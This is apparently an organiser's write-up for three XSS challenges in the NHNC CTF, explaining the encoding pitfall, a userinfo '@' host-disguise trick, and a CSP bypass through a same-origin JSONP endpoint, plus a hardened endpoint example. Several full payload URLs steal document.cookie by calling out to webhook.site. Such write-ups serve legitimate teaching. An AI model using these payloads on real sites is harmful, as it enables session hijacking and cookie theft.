NHNC CTF Official Write Up for Miday


Table Of Contents

  • Miday
  • Miday Revenge
  • Miday Revenge Revenge
  • Some final thoughts

Miday

Simple XSS

should be simple (?)

What made this challenge a little bit difficult is the encoding: in a query string, + decodes to " " (a space), so the + that concatenates document.cookie in the payload below turns into a space and the script never runs.

Common Wrong Payload:

http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/`+document.cookie)%3C/script%3E
Also see: https://www.w3schools.com/tags/ref_urlencode.ASP

Result


Intended Solution

http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/${document.cookie}`)%3C/script%3E
Uses string interpolation: ${document.cookie} inside the template literal, so the payload needs no + and nothing gets decoded to a space.

Miday Revenge

the little @

What might be wrong?


Common Wrong Payload

http://docs.google.com@http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E

Results.....


Intended Solution

http://docs.google.com@miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E
Everything between :// and the @ is userinfo, not the host, so the string still begins with docs.google.com while the browser actually resolves miday_revenge_aaaaa.nicewhite.eu.org:60005.

Miday Revenge Revenge

That Google CSP is a scam, I mean.


CSP Policies?


OK, I see.

<meta http-equiv="Content-Security-Policy" content="script-src 'self' https://www.google.com; img-src 'self' ; default-src 'self'">

https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//

No. Google's endpoint sanitises the jsonp callback, so alert(1) never makes it into the response.

fetch is blocked the same way:

"><script src=https://www.google.com/complete/search?client=chrome&q=123&jsonp=fetch(`webhook.site/aa/${document.cookie}`)// ></script>

Bypass Google.com JSONP filter?


Maybe, but I'm a noob so I can't.


Wait


XSS via JSONP?

YES. The app's own /api/v1/getnews endpoint reflects the callback parameter straight into its response, and since that response is same-origin it is exactly what script-src 'self' allows:

"><script src=/api/v1/getnews?callback=top.location=`meow`//></script>">

So the intended solution was...

http://miday_revenge_revenge.nicewhite.eu.org:60006/search?search=a%22%3E%3Cscript%20src=/api/v1/getnews?callback=top.location=`https://webhook.site/5155f756-cc73-4d6b-b1b1-70c4a8f372aa/${document.cookie}`//%3E%3C/script%3E%22%3E

Works

Google CSP is a scam XD
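As an added example (not code from the write-up or the challenge), here is a minimal model of the same-origin JSONP endpoint that makes script-src 'self' moot, beside a hardened version of it; the /api/v1/getnews handler shape and the sample news item are assumptions.

```javascript
// Added example, not code from the write-up or the challenge. It models the
// same-origin /api/v1/getnews JSONP endpoint that made `script-src 'self'`
// useless on Miday Revenge Revenge, and shows the server-side fix. The handler
// shape and the sample news item are assumptions.

const NEWS = [{ id: 1, title: "constructed sample news item" }]; // constructed data

// A legitimate JSONP callback is a plain (optionally dotted) JS identifier.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// Vulnerable handler: ?callback= is reflected verbatim, so a value such as
//   top.location=`meow`//
// turns the response into caller-chosen script. It is served from the
// page's own origin, so 'self' in the CSP allows it.
function getNewsUnsafe(queryString) {
  const cb = new URLSearchParams(queryString).get("callback") || "callback";
  return {
    status: 200,
    headers: { "Content-Type": "application/javascript" },
    body: `${cb}(${JSON.stringify(NEWS)})`,
  };
}

// Hardened handler: reject anything that is not an identifier, send nosniff so
// the response cannot be reinterpreted as another type, and prefix /**/ so the
// body never starts with caller-controlled bytes.
function getNewsSafe(queryString) {
  const cb = new URLSearchParams(queryString).get("callback") || "callback";
  if (!CALLBACK_RE.test(cb)) {
    return { status: 400, headers: { "Content-Type": "text/plain" }, body: "bad callback" };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "X-Content-Type-Options": "nosniff",
    },
    body: `/**/${cb}(${JSON.stringify(NEWS)})`,
  };
}

// The callback shape from the write-up, percent-encoded as a browser sends it.
const PAYLOAD = "callback=" + encodeURIComponent("top.location=`meow`//");
```

Even with the callback check, any endpoint on the origin that reflects a parameter into a script response is a script source under 'self', so serving plain JSON with CORS instead of JSONP removes the problem entirely.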

My Final Thoughts


Hello, thanks for reading.
I hope all of you had fun && learned something during the event.
Those challenge ideas came from the cool things I've learned while researching cyber security.
(And I didn't expect 'miday' to be that hard XD)


We fixed a lot of unintended solutions and got DoSed midway (miday was hosted on my homelab, and it got knocked down 🫠):

bash fork: retry: Resource temporarily unavailable

And our main machine went OOM (out of memory) during the competition; we had to contact our hoster to reboot it, and immediately set RAM/CPU limits on those Docker containers.


Anyways, it was fun!

HackMD: Miday - HackMD